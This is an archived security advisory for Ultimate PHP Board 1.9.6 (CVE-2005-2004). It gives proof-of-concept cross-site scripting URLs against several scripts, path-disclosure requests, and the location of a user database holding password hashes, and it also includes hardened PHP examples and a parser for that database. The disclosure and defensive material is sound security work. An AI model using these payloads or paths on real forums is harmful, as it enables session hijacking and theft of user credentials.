SecurityTracker Archives
Category:   Application (Forum/Board/Portal)  >   Ultimate PHP Board
Vendors:   Hoeppner, Tim
Ultimate PHP Board Input Validation Holes in Multiple Scripts Allow Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1014220
SecurityTracker URL:  http://securitytracker.com/id/1014220
CVE Reference:   CVE-2005-2004
Updated:  Jun 21 2006
Original Entry Date:  Jun 16 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information
Exploit Included:  Yes  
Version(s): 1.9.6 GOLD and prior versions
Description:   Several input validation vulnerabilities were reported in Ultimate PHP Board (UPB). A remote user can conduct cross-site scripting attacks, read the user database on some configurations, and obtain the installation path.

The 'login.php' script does not properly validate user-supplied input in the 'ref' parameter before echoing it into a form's action attribute. Other scripts are also affected, including the 'viewtopic.php', 'profile.php', 'newpost.php', 'email.php', 'icq.php', 'aol.php', 'getpass.php', and 'search.php' scripts. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the UPB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

On some systems, a remote user can request the following URL directly to obtain potentially sensitive user information, including password hashes:

http://[target]/upb/db/users.dat

A remote user can supply an invalid parameter value (such as an id of 0) to trigger a PHP error message that discloses the installation path.

Some demonstration exploit URLs are provided:

http://[target]/upb/viewtopic.php?id=0

http://[target]/upb/profile.php?action=get&id=0

http://[target]/upb/newpost.php?t_id=0

Alberto Trivero reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the UPB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can obtain information about the users on the target application.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.myupb.com/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB


M4DR007-06SA (security advisory): Multiple vulnerabilities in UPB 1.9.6 GOLD

Published: 06 16 2005

Released: 06 16 2005

Name: Ultimate PHP Board (UPB)

Affected Systems: <= 1.9.6 GOLD

Issue: Full Path Disclosure, Cross-Site Scripting, Sensitive Information Disclosure

Author: Alberto Trivero

Vendor: http://www.myupb.com/ourscripts_upb.php





Software Description

***********


"UPB is a forum/message board script. It supports threaded discussion with a
comprehensive text database system that we wrote here at php outburst for the
backend."



Full Path Disclosure

*******


Because the values of some variables are not properly checked, it is possible
to cause errors and obtain the full installation path by sending simple
requests like these:

    http://www.example.com/upb/viewtopic.php?id=0
    http://www.example.com/upb/profile.php?action=get&id=0
    http://www.example.com/upb/newpost.php?t_id=0



Cross-Site Scripting (XSS)

*******


Let's look at code from login.php at line 69:

    <?
    ...
    echo "<form action='login.php?ref=$ref&l=1' method=POST>

    <center>$skin_tableheading
    ...
    ?>

The $ref parameter can be controlled by a remote user and UPB does not sanitise
its value before echoing it, so a malicious user can inject HTML code like
this:

    '><script>alert(document.cookie)</script>

which turns the HTML line into:

    <form action='login.php?ref='><script>alert(document.cookie)</script>&l=1' method=POST>

The single quote closes the action attribute, and the browser executes the
<script>...</script> tag that follows, which in this case displays the cookies.
This is the PoC URL:


http://www.example.com/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Let's look now at code from viewtopic.php at line 13:

    <?
    ...
    $where = "<b>></b> <a href='viewforum.php?id=$id'>$w_forum[forum]</a>
<b>></b> $w_topic[subject]";
    ...
    ?>

The $id parameter has the same problem, exploitable with a URL like this:


http://www.example.com/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

These are other PoC URLs for other parameters:


http://www.example.com/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/upb/newpost.php?id=1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
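As an added example (this is not code from UPB or from the advisory), here is the unsafe interpolation shown above for login.php and viewtopic.php next to a hardened version in PHP. The function names, the whitelist in validate_ref() and the sample inputs are this example's own assumptions; the payload from the advisory is used as input. The integer-id half also closes the id=0 error path used above for full path disclosure, because an invalid id is rejected before any lookup can fail.

```php
<?php
// Added example, not UPB's code. Two output contexts from the advisory:
//   - $ref, a string echoed into a URL inside an HTML attribute (login.php)
//   - $id, a number echoed into a link (viewtopic.php)
declare(strict_types=1);

// Constructed attacker input: the exact payload from the advisory.
const PAYLOAD = "'><script>alert(document.cookie)</script>";

// --- Unsafe pattern, as in login.php: raw value inside a single-quoted attribute
function render_login_form_unsafe(string $ref): string
{
    return "<form action='login.php?ref=$ref&l=1' method=POST>";
}

// --- Hardened version
// Step 1: validate. ref only ever names a local UPB script (plus an optional
// simple query string), so anything else falls back to a safe default.
// (Whitelist is an assumption of this example, not taken from UPB.)
function validate_ref(string $ref): string
{
    if (!preg_match('/^[a-z_]+\.php(\?[a-z0-9_=&]+)?$/i', $ref)) {
        return 'index.php';
    }
    return $ref;
}

// Step 2: encode for the context. The value is a query-string component that
// sits inside an attribute, so URL-encode it first, then HTML-escape the whole
// attribute with ENT_QUOTES so a single quote can never close the attribute.
function render_login_form_safe(string $ref): string
{
    $ref = validate_ref($ref);
    $url = 'login.php?ref=' . rawurlencode($ref) . '&l=1';
    return "<form action='" . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . "' method=POST>";
}

// Numeric parameters (id, t_id, page) must never be handled as free strings.
// FILTER_VALIDATE_INT with min_range 1 rejects the XSS payload, "abc" and 0,
// so the id=0 request that triggers the path-disclosing error never reaches
// the database lookup.
function positive_int(?string $raw): ?int
{
    $v = filter_var($raw ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

// Hardened counterpart of the viewtopic.php breadcrumb line quoted above.
function render_breadcrumb_safe(?string $rawId, string $forumName, string $subject): string
{
    $id = positive_int($rawId);
    if ($id === null) {
        return 'Invalid forum id';   // clean message: no PHP warning, no path
    }
    $f = htmlspecialchars($forumName, ENT_QUOTES, 'UTF-8');
    $s = htmlspecialchars($subject, ENT_QUOTES, 'UTF-8');
    return "<b>&gt;</b> <a href='viewforum.php?id=$id'>$f</a> <b>&gt;</b> $s";
}

// Demonstration: same payload through the unsafe and the hardened renderers.
echo render_login_form_unsafe(PAYLOAD), "\n";
echo render_login_form_safe(PAYLOAD), "\n";
echo render_breadcrumb_safe(PAYLOAD, 'General', 'Hello'), "\n";
echo render_breadcrumb_safe('0', 'General', 'Hello'), "\n";
echo render_breadcrumb_safe('7', "Tim's forum", '<b>not bold</b>'), "\n";
```

Run it with the php command-line binary: the unsafe renderer produces the broken form tag exactly as described above, while the hardened renderer falls back to index.php and emits only an escaped attribute. Two points carry beyond this particular forum: encode for the output context (here rawurlencode() for the query component, then htmlspecialchars() with ENT_QUOTES for the attribute), and validate ids as integers instead of interpolating them as strings. For the path disclosure, additionally set display_errors = Off and log_errors = On in php.ini on production hosts so that warnings go to the error log rather than into the response.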



Sensitive Information Disclosure

*********


In many cases (always with non-Apache web servers, and sometimes with Apache
too) it is possible to obtain sensitive information about all the users
registered on the UPB forum by browsing directly to this file:

    http://www.example.com/upb/db/users.dat

which contains one record per user, structured like this:


user_name<~>password<~>level<~>email<~>view_email<~>mail_list<~>location<~>url<~>avatar<~>icq<~>aim<~>msn<~>sig<~>posts<~>date_added<~>id

The users' passwords are encrypted, and to automate the decryption I made a
script available at this address: http://albythebest.altervista.org/upb.pl
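As an added example (not part of the advisory and not UPB's code), the following PHP script parses the users.dat layout quoted above and summarises what a leaked copy exposes, which is the first thing an incident responder needs after finding the file reachable. The field list is taken from the record layout above; the function names and the sample records are this example's own constructed assumptions.

```php
<?php
// Added example, not UPB's code: parser for the users.dat flat-file layout
// quoted in the advisory, plus a blast-radius summary of a leaked copy.
declare(strict_types=1);

// Field order exactly as given in the advisory's record layout.
const USERS_DAT_FIELDS = [
    'user_name', 'password', 'level', 'email', 'view_email', 'mail_list',
    'location', 'url', 'avatar', 'icq', 'aim', 'msn', 'sig', 'posts',
    'date_added', 'id',
];

// One record per line, fields separated by "<~>". Lines with the wrong number
// of fields are skipped rather than silently mis-aligned against the header.
function parse_users_dat(string $contents): array
{
    $records = [];
    foreach (preg_split('/\r\n|\n|\r/', $contents) as $line) {
        if (trim($line) === '') {
            continue;
        }
        $fields = explode('<~>', $line);
        if (count($fields) !== count(USERS_DAT_FIELDS)) {
            continue;
        }
        $records[] = array_combine(USERS_DAT_FIELDS, $fields);
    }
    return $records;
}

// Report the columns that matter for an exposure assessment: account names,
// privilege levels, e-mail addresses and the password field. Password values
// are masked so the summary can be shared without re-leaking the hashes.
function exposure_summary(array $records): array
{
    $out = [];
    foreach ($records as $r) {
        $out[] = [
            'user'   => $r['user_name'],
            'level'  => $r['level'],
            'email'  => $r['email'],
            'pwhash' => substr($r['password'], 0, 4) . str_repeat('*', 8),
        ];
    }
    return $out;
}

// Constructed sample contents (invented values, not a real users.dat). The
// third line is deliberately malformed to show that it is skipped.
$sample = "admin<~>0123456789abcdef<~>3<~>admin@example.com<~>0<~>1<~>Rome<~>http://example.com<~>1.gif<~>0<~>0<~>0<~>hello<~>42<~>2005-06-01<~>1\n"
        . "alice<~>fedcba9876543210<~>1<~>alice@example.com<~>1<~>0<~><~><~>2.gif<~>12345<~>al<~><~><~>3<~>2005-06-10<~>2\n"
        . "broken line without separators\n";

$records = parse_users_dat($sample);
printf("%d user record(s) exposed\n", count($records));
print_r(exposure_summary($records));
```

On a real engagement, feed the file fetched from /upb/db/users.dat into parse_users_dat() instead of the constructed sample. After the db/ directory has been protected, verify the fix from outside rather than trusting the configuration: a HEAD or GET request for /upb/db/users.dat must come back 403 or 404, not 200. A protection that lives only in an Apache .htaccess file does nothing on a server that does not read that file, which is consistent with the advisory's note that non-Apache servers always expose it.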



Solution

*********


The vendor has been contacted many times, but a patch has not yet been produced.



Alberto Trivero - trivero@jumpy.it

Come cheer us at #security-it on Freenode ( irc.freenode.net )

(C) 2005 Copyright by Madroot Security Group

 
 



Copyright 2020, SecurityGlobal.net LLC